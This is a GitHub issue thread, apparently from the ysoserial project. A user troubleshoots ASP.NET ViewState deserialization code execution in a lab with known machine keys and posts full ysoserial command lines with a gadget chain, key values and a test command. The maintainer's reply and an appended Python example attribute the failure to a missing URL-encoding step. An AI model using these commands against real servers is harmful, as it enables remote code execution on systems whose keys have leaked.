Constantly encountering FormatException: Invalid length for a Base-64 char array or string.
deathalliance opened this issue
Hello,
I'm trying the code execution vulnerability in a lab environment where the validation key and decryption keys are known. Unfortunately, I cannot get it to work no matter what I try.
I'm using .NET 4.0.
I've tried both by setting the ViewStateGenerator and through setting the app path (and I confirm that the ViewStateGenerator value is correct). I have also tried appending ='s at the end of the generated code. I've also tried URL encoding the generated viewstate that I send through the POST request.
Nothing works. I can't even get a single echo 123 > c:\windows\temp\test.txt working. What am I doing wrong?
(I know it should throw a 500 exception, but it should also create test.txt which it doesn't)
Here is some of the code I have tried:
ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "echo 123 > c:\windows\temp\test.txt" --apppath="/p" --path="/p/default.aspx" --islegacy --validationalg="SHA1" --validationkey="1CAD8CD7D5084010C7AC86E09C048DF2E6351D8E1458173BD2F60C948FDCFC79474E7C4BFB8053B3D599D564C3F8F16CD36D4BFF85DC2B86964E110CAB5529B5" --isdebug
Also tried with giving both keys:
ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "echo 123 > c:\windows\temp\test.txt" --path="/p/default.aspx" --apppath="/p" --decryptionalg="Auto" --decryptionkey="9419E035D0FF7D8038D0DA7A21AFB4482C82E939147FB1C1B1F7EBCDDC69B617" --validationalg="SHA1" --validationkey="1CAD8CD7D5084010C7AC86E09C048DF2E6351D8E1458173BD2F60C948FDCFC79474E7C4BFB8053B3D599D564C3F8F16CD36D4BFF85DC2B86964E110CAB5529B5"
The generator code for the above path is 333BF894
Thanks!
I am guessing here but I think it can be because of lack of URL-encoding and the fact that it converts the + character to space if it has not been encoded.
I will close it for now but feel free to comment to re-open it if it has nothing to do with URL-encoding. I will also try to add URL-encoding to the output by default in the next version.
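The encoding behaviour suggested in the reply above, as an added example that is not part of the original thread or of the tool's own code: a form-urlencoded body turns an unencoded `+` into a space, and a Base64 decoder that skips white space then sees a length that is no longer a multiple of four. The sample bytes are constructed, and the length check is a simplified model based on the documented behaviour of .NET's `Convert.FromBase64String`; assuming that is the decoder involved is this example's assumption.

```python
import base64
from urllib.parse import parse_qs, quote

# Constructed sample bytes (not a real ViewState), chosen so that the Base64
# text contains '+', '/' and '=' padding: "++//AA==".
SAMPLE = bytes([0xFB, 0xEF, 0xFF, 0x00])
FIELD = "__VIEWSTATE"


def received_value(body: str) -> str:
    """Decode a form-urlencoded POST body the way a server does."""
    return parse_qs(body, keep_blank_values=True)[FIELD][0]


def base64_length_ok(value: str) -> bool:
    """Simplified model of the decoder's length check: white space is
    skipped and the remaining characters must be a multiple of four."""
    significant = "".join(value.split())
    return len(significant) % 4 == 0


def compare(raw: bytes = SAMPLE) -> dict:
    """Send the same Base64 text raw and percent-encoded; report both."""
    b64 = base64.b64encode(raw).decode("ascii")
    results = {}
    for label, wire in (("raw", b64), ("encoded", quote(b64, safe=""))):
        value = received_value(f"{FIELD}={wire}")
        results[label] = {
            "wire": wire,
            "received": value,
            "length_ok": base64_length_ok(value),
            "intact": value == b64,
        }
    return results


if __name__ == "__main__":
    for label, info in compare().items():
        print(label, info)
```

Appending `=` characters does not repair the raw case, because the characters lost to the `+` conversion are data, not padding.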